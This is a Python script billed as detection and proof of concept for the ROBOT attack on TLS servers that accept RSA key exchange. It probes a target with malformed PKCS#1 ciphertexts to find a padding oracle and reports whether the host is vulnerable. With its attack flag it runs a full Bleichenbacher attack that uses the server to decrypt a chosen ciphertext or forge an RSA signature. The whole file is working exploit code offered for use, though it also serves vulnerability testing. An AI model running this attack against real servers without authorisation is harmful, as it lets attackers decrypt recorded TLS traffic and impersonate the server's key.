#!/usr/bin/env python3 # Detection and proof of concept for the ROBOT attack # https://robotattack.org/ # # This code is licensed as CC0. # standard modules import math import time import sys import socket import os import argparse import ssl import gmpy2 from cryptography import x509 from cryptography.hazmat.backends import default_backend # This uses all TLS_RSA ciphers with AES and 3DES ch_def = bytearray.fromhex("16030100610100005d03034f20d66cba6399e552fd735d75feb0eeae2ea2ebb357c9004e21d0c2574f837a000010009d003d0035009c003c002f000a00ff01000024000d0020001e060106020603050105020503040104020403030103020303020102020203") # This uses only TLS_RSA_WITH_AES_128_CBC_SHA (0x002f) ch_cbc = bytearray.fromhex("1603010055010000510303ecce5dab6f55e5ecf9cccd985583e94df5ed652a07b1f5c7d9ba7310770adbcb000004002f00ff01000024000d0020001e060106020603050105020503040104020403030103020303020102020203") # This uses only TLS-RSA-WITH-AES-128-GCM-SHA256 (0x009c) ch_gcm = bytearray.fromhex("1603010055010000510303ecce5dab6f55e5ecf9cccd985583e94df5ed652a07b1f5c7d9ba7310770adbcb000004009c00ff01000024000d0020001e060106020603050105020503040104020403030103020303020102020203") ccs = bytearray.fromhex("000101") enc = bytearray.fromhex("005091a3b6aaa2b64d126e5583b04c113259c4efa48e40a19b8e5f2542c3b1d30f8d80b7582b72f08b21dfcbff09d4b281676a0fb40d48c20c4f388617ff5c00808a96fbfe9bb6cc631101a6ba6b6bc696f0") MSG_FASTOPEN = 0x20000000 # set to true if you want to generate a signature or if the first ciphertext is not PKCS#1 v1.5 conform EXECUTE_BLINDING = True def get_rsa_from_server(server, port): try: ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE ctx.set_ciphers("RSA") raw_socket = socket.socket() raw_socket.settimeout(timeout) s = ctx.wrap_socket(raw_socket) s.connect((server, port)) cert_raw = s.getpeercert(binary_form=True) cert_dec = x509.load_der_x509_certificate(cert_raw, default_backend()) s.close() return cert_dec.public_key().public_numbers().n, cert_dec.public_key().public_numbers().e except ssl.SSLError as e: if not args.quiet: print("Cannot connect to server: %s" % e) print("Server does not seem to allow connections with TLS_RSA (this is ideal).") if args.csv: # TODO: We could add an extra check that the server speaks TLS without RSA print("NORSA,%s,%s,,,,,,,," % (args.host, ip)) s.close() quit() except (ConnectionRefusedError, socket.timeout) as e: if not args.quiet: print("Cannot connect to server: %s" % e) print("There seems to be no TLS on this host/port.") if args.csv: print("NOTLS,%s,%s,,,,,,,," % (args.host, ip)) quit() def oracle(pms, messageflow=False): global cke_version try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) if not enable_fastopen: s.connect((ip, args.port)) s.sendall(ch) else: s.sendto(ch, MSG_FASTOPEN, (ip, args.port)) s.settimeout(timeout) buf = bytearray.fromhex("") i = 0 bend = 0 while True: # we try to read twice while i + 5 > bend: buf += s.recv(4096) bend = len(buf) # this is the record size psize = buf[i + 3] * 256 + buf[i + 4] # if the size is 2, we received an alert if (psize == 2): s.close() return ("The server sends an Alert after ClientHello") # try to read further record data while i + psize + 5 > bend: buf += s.recv(4096) bend = len(buf) # check whether we have already received a ClientHelloDone if (buf[i + 5] == 0x0e) or (buf[bend - 4] == 0x0e): break i += psize + 5 cke_version = buf[9:11] s.send(bytearray(b'\x16') + cke_version) s.send(cke_2nd_prefix) s.send(pms) if not messageflow: s.send(bytearray(b'\x14') + cke_version + ccs) s.send(bytearray(b'\x16') + cke_version + enc) try: alert = s.recv(4096) s.close() if len(alert) == 0: return ("No data received from server") if alert[0] == 0x15: if len(alert) < 7: return ("TLS alert was truncated (%s)" % (repr(alert))) return ("TLS alert %i of length %i" % (alert[6], len(alert))) else: return "Received something other than an alert (%s)" % (alert[0:10]) except ConnectionResetError as e: s.close() return "ConnectionResetError" except socket.timeout: s.close() return ("Timeout waiting for alert") s.close() except Exception as e: # exc_type, exc_obj, exc_tb = sys.exc_info() # print("line %i", exc_tb.tb_lineno) # print ("Exception received: " + str(e)) s.close() return str(e) def BleichenbacherOracle(cc): global count global countvalid count = count + 1 if count % 1000 == 0: print(count, "oracle queries") tmp = hex(cc).rstrip("L").lstrip("0x").rjust(modulus_bits // 4, '0') pms = bytearray.fromhex(tmp) o = oracle(pms, messageflow=flow) if o == oracle_good: # Query the oracle again to make sure it is real... o = oracle(pms, messageflow=flow) if o == oracle_good: countvalid += 1 return True else: print("Inconsistent result from oracle.") return False else: return False parser = argparse.ArgumentParser(description="Bleichenbacher attack") parser.add_argument("host", help="Target host") group = parser.add_mutually_exclusive_group() group.add_argument("-r", "--raw", help="Message to sign or decrypt (raw hex bytes)") group.add_argument("-m", "--message", help="Message to sign (text)") parser.add_argument("s0", nargs="?", default="1", help="Start for s0 value (default 1)") parser.add_argument("limit", nargs="?", default="-1", help="Start for limit value (default -1)") parser.add_argument("-a", "--attack", help="Try to attack if vulnerable", action="store_true") parser.add_argument("-p", "--port", metavar='int', default=443, help="TCP port") parser.add_argument("-t", "--timeout", default=5, help="Timeout") parser.add_argument("-q", "--quiet", help="Quiet", action="store_true") groupcipher = parser.add_mutually_exclusive_group() groupcipher.add_argument("--gcm", help="Use only GCM/AES256.", action="store_true") groupcipher.add_argument("--cbc", help="Use only CBC/AES128.", action="store_true") parser.add_argument("--csv", help="Output CSV format", action="store_true") args = parser.parse_args() args.port = int(args.port) timeout = float(args.timeout) if args.gcm: ch = ch_gcm elif args.cbc: ch = ch_cbc else: ch = ch_def # We only enable TCP fast open if the Linux proc interface exists enable_fastopen = os.path.exists("/proc/sys/net/ipv4/tcp_fastopen") try: ip = socket.gethostbyname(args.host) except socket.gaierror as e: if not args.quiet: print("Cannot resolve host: %s" % e) if args.csv: print("NODNS,%s,,,,,,,,," % (args.host)) quit() if not args.quiet: print("Scanning host %s ip %s port %i" % (args.host, ip, args.port)) N, e = get_rsa_from_server(ip, args.port) modulus_bits = int(math.ceil(math.log(N, 2))) modulus_bytes = (modulus_bits + 7) // 8 if not args.quiet: print("RSA N: %s" % hex(N)) print("RSA e: %s" % hex(e)) print("Modulus size: %i bits, %i bytes" % (modulus_bits, modulus_bytes)) cke_2nd_prefix = bytearray.fromhex("{0:0{1}x}".format(modulus_bytes + 6, 4) + "10" + "{0:0{1}x}".format(modulus_bytes + 2, 6) + "{0:0{1}x}".format(modulus_bytes, 4)) # pad_len is length in hex chars, so bytelen * 2 pad_len = (modulus_bytes - 48 - 3) * 2 rnd_pad = ("abcd" * (pad_len // 2 + 1))[:pad_len] rnd_pms = "aa112233445566778899112233445566778899112233445566778899112233445566778899112233445566778899" pms_good_in = int("0002" + rnd_pad + "00" + "0303" + rnd_pms, 16) # wrong first two bytes pms_bad_in1 = int("4117" + rnd_pad + "00" + "0303" + rnd_pms, 16) # 0x00 on a wrong position, also trigger older JSSE bug pms_bad_in2 = int("0002" + rnd_pad + "11" + rnd_pms + "0011", 16) # no 0x00 in the middle pms_bad_in3 = int("0002" + rnd_pad + "11" + "1111" + rnd_pms, 16) # wrong version number (according to Klima / Pokorny / Rosa paper) pms_bad_in4 = int("0002" + rnd_pad + "00" + "0202" + rnd_pms, 16) pms_good = int(gmpy2.powmod(pms_good_in, e, N)).to_bytes(modulus_bytes, byteorder="big") pms_bad1 = int(gmpy2.powmod(pms_bad_in1, e, N)).to_bytes(modulus_bytes, byteorder="big") pms_bad2 = int(gmpy2.powmod(pms_bad_in2, e, N)).to_bytes(modulus_bytes, byteorder="big") pms_bad3 = int(gmpy2.powmod(pms_bad_in3, e, N)).to_bytes(modulus_bytes, byteorder="big") pms_bad4 = int(gmpy2.powmod(pms_bad_in4, e, N)).to_bytes(modulus_bytes, byteorder="big") oracle_good = oracle(pms_good, messageflow=False) oracle_bad1 = oracle(pms_bad1, messageflow=False) oracle_bad2 = oracle(pms_bad2, messageflow=False) oracle_bad3 = oracle(pms_bad3, messageflow=False) oracle_bad4 = oracle(pms_bad4, messageflow=False) if (oracle_good == oracle_bad1 == oracle_bad2 == oracle_bad3 == oracle_bad4): if not args.quiet: print("Identical results (%s), retrying with changed messageflow" % oracle_good) oracle_good = oracle(pms_good, messageflow=True) oracle_bad1 = oracle(pms_bad1, messageflow=True) oracle_bad2 = oracle(pms_bad2, messageflow=True) oracle_bad3 = oracle(pms_bad3, messageflow=True) oracle_bad4 = oracle(pms_bad4, messageflow=True) if (oracle_good == oracle_bad1 == oracle_bad2 == oracle_bad3 == oracle_bad4): if not args.quiet: print("Identical results (%s), no working oracle found" % oracle_good) print("NOT VULNERABLE!") if args.csv: print("SAFE,%s,%s,,,,%s,%s,%s,%s,%s" % (args.host, ip, oracle_good, oracle_bad1, oracle_bad2, oracle_bad3, oracle_bad4)) sys.exit(1) else: flow = True else: flow = False # Re-checking all oracles to avoid unreliable results oracle_good_verify = oracle(pms_good, messageflow=flow) oracle_bad_verify1 = oracle(pms_bad1, messageflow=flow) oracle_bad_verify2 = oracle(pms_bad2, messageflow=flow) oracle_bad_verify3 = oracle(pms_bad3, messageflow=flow) oracle_bad_verify4 = oracle(pms_bad4, messageflow=flow) if (oracle_good != oracle_good_verify) or (oracle_bad1 != oracle_bad_verify1) or (oracle_bad2 != oracle_bad_verify2) or (oracle_bad3 != oracle_bad_verify3) or (oracle_bad4 != oracle_bad_verify4): if not args.quiet: print("Getting inconsistent results, aborting.") if args.csv: print("INCONSISTENT,%s,%s,,,,%s,%s,%s,%s,%s" % (args.host, ip, oracle_good, oracle_bad1, oracle_bad2, oracle_bad3, oracle_bad4)) quit() # If the response to the invalid PKCS#1 request (oracle_bad1) is equal to both # requests starting with 0002, we have a weak oracle. This is because the only # case where we can distinguish valid from invalid requests is when we send # correctly formatted PKCS#1 message with 0x00 on a correct position. This # makes our oracle weak if (oracle_bad1 == oracle_bad2 == oracle_bad3): oracle_strength = "weak" if not args.quiet: print("The oracle is weak, the attack would take too long") else: oracle_strength = "strong" if not args.quiet: print("The oracle is strong, real attack is possible") if flow: flowt = "shortened" else: flowt = "standard" if cke_version[0] == 3 and cke_version[1] == 0: tlsver = "SSLv3" elif cke_version[0] == 3 and cke_version[1] == 1: tlsver = "TLSv1.0" elif cke_version[0] == 3 and cke_version[1] == 2: tlsver = "TLSv1.1" elif cke_version[0] == 3 and cke_version[1] == 3: tlsver = "TLSv1.2" else: tlsver = "TLS raw version %i/%i" % (cke_version[0], cke_version[1]) if args.csv: print("VULNERABLE,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s" % (args.host, ip, tlsver, oracle_strength, flowt, oracle_good, oracle_bad1, oracle_bad2, oracle_bad3, oracle_bad4)) else: print("VULNERABLE! Oracle (%s) found on %s/%s, %s, %s message flow: %s/%s (%s / %s / %s)" % (oracle_strength, args.host, ip, tlsver, flowt, oracle_good, oracle_bad1, oracle_bad2, oracle_bad3, oracle_bad4)) if not args.quiet: print("Result of good request: %s" % oracle_good) print("Result of bad request 1 (wrong first bytes): %s" % oracle_bad1) print("Result of bad request 2 (wrong 0x00 position): %s" % oracle_bad2) print("Result of bad request 3 (missing 0x00): %s" % oracle_bad3) print("Result of bad request 4 (bad TLS version): %s" % oracle_bad4) # Only continue if we want to attack if not args.attack: sys.exit(0) B = int("0001" + "00" * (modulus_bytes - 2), 16) if args.raw: C = int(args.raw, 16) else: if not args.message: msg = "This message was signed with a Bleichenbacher oracle." print('No message given, will sign "This message was signed with a Bleichenbacher oracle."') else: msg = args.message C = int("0001" + "ff" * (modulus_bytes - len(msg) - 3) + "00" + "".join("{:02x}".format(ord(c)) for c in msg), 16) ################################################################################ # define Bleichenbacher Oracle count = 0 countvalid = 0 print("Using the following ciphertext: ", hex(C)) starttime = time.time() a = int(2 * B) b = int(3 * B - 1) s0 = int(args.s0) limit = int(args.limit) c0 = C # Step 1: Blinding print("Searching for the first valid ciphertext starting %i" % s0) if (EXECUTE_BLINDING): while not BleichenbacherOracle(c0): s0 = s0 + 1 c0 = (int(gmpy2.powmod(s0, e, N)) * C) % N if (limit != -1) and s0 > limit: quit() print(" -> Found s0: ", s0) M = set() M.add((a, b)) Mnew = set() Mnext = set() previntervalsize = 0 i = 1 while True: # find pairs r,s such that m*s % N = m*s-r*N is PKCS conforming # 2.a) if i == 1: s = N // (3 * B) cc = (int(gmpy2.powmod(s, e, N)) * c0) % N while not BleichenbacherOracle(cc): s += 1 cc = (int(gmpy2.powmod(s, e, N)) * c0) % N # 2.b) if not i == 1 and len(M) >= 2: s += 1 cc = (int(gmpy2.powmod(s, e, N)) * c0) % N while not BleichenbacherOracle(cc): s += 1 cc = (int(gmpy2.powmod(s, e, N)) * c0) % N # 2.c) if not i == 1 and len(M) == 1: a, b = M.pop() M.add((a, b)) r = 2 * (b * s - 2 * B) // N s = -(-(2 * B + r * N // b)) cc = (int(gmpy2.powmod(s, e, N)) * c0) % N while not BleichenbacherOracle(cc): s += 1 if s > ((3 * B + r * N) // a): r += 1 s = -(-(2 * B + r * N) // b) cc = (int(gmpy2.powmod(s, e, N)) * c0) % N # compute all possible r, depending on the known bounds on m. # Use that 2*B+r*N <= ms <= 3*B-1+r*N # is equivalent to (a*s-3*B-1)/N <= r <= (b*s-2*B)/N # 3. for MM in M: a, b = MM rmax = (b * s - 2 * B) // N rmin = -(-(a * s - 3 * B - 1) // N) # for all possible pairs (s,r) we obtain bounds # (2*B+r*N)/s) <= m <= (3*B+1+r*N)/s) on m. # Add bounds only if they make sense, i.e., if a < b. for r in range(rmin, rmax + 1): anew = (2 * B + r * N) // s bnew = -(-(3 * B + 1 + r * N) // s) if anew < bnew: Mnew.add((anew, bnew)) # Keep only intervals which are compatible with previous intervals Mnext.clear() for MMnew in Mnew: anew, bnew = MMnew for MM in M: a, b = MM if (bnew <= b and bnew >= a) or (anew >= a and anew <= b) or (anew >= a and bnew <= b and anew <= bnew) or (anew <= a and bnew >= b): Mnext.add((max([a, anew]), min([b, bnew]))) M.clear() Mnew.clear() M |= Mnext if len(M) == 1: a, b = M.pop() M.add((a, b)) intervalsize = int(math.ceil(math.log(b - a, 2))) if not intervalsize == previntervalsize: previntervalsize = intervalsize print(count, "oracle queries, Interval size:", intervalsize, "bit.") if intervalsize < 10: break i += 1 print print("Starting exhaustive search on remaining interval") print("min: ", hex(a)) print("max: ", hex(b)) while not c0 == int(gmpy2.powmod(a, e, N)): a += 1 print("C: ", hex(C)) print("result: ", hex(a)) if s0 != 1: x = int(gmpy2.invert(s0, N)) res = (x * a) % N print("result after unblinding: ", hex(res)) stoptime = time.time() print("Time elapsed:", stoptime - starttime, "seconds (=", (stoptime - starttime) / 60, "minutes)") print("Modulus size:", int(math.ceil(math.log(N, 2))), "bit. About", (stoptime - starttime) / math.ceil(math.log(N, 2)), "seconds per bit.") print(count, "oracle queries performed,", countvalid, "valid ciphertexts.")